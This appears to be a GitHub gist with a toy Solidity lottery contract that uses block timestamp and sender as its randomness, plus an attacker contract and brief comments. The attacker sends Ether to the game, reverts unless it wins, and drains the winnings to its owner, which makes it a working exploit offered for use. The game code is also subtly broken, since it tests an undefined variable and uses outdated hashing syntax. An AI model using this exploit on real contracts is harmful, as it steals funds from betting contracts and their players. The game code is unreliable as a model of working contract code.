Last active
October 15, 2021 07:02
-
-
Save ninjaahhh/8f2760670b65290548114a2ef4d1aa6f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract SimpleGame { | |
| function addFund() public payable { | |
| // Thank you. | |
| } | |
| receive() public payable { | |
| if (msg.value == 0) { | |
| return; | |
| } | |
| uint256 luck = uint256(keccak256(block.timestamp, msg.sender)) % 100; | |
| // 50% winning chance. | |
| if (lottery < 50) { | |
| msg.sender.transfer(2 * msg.value); | |
| } | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract SimpleGameAttacker { | |
| address public owner; | |
| constructor() public { | |
| owner = msg.sender; | |
| } | |
| function () public payable { | |
| } | |
| function attack(address gameAddress) public { | |
| uint256 balance = this.balance; | |
| gameAddress.call.value(balance)(); | |
| // balance should update | |
| if (this.balance <= balance) { | |
| revert(); | |
| } | |
| } | |
| function drain() public { | |
| if (msg.sender != owner) { | |
| revert(); | |
| } | |
| owner.transfer(address(this).balance); | |
| } | |
| } |
added a very easy attacker. tested in remix.
attacker contract has to deploy to the same shard as contract being attacked?
@qcdll yes
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
let's have some fun!!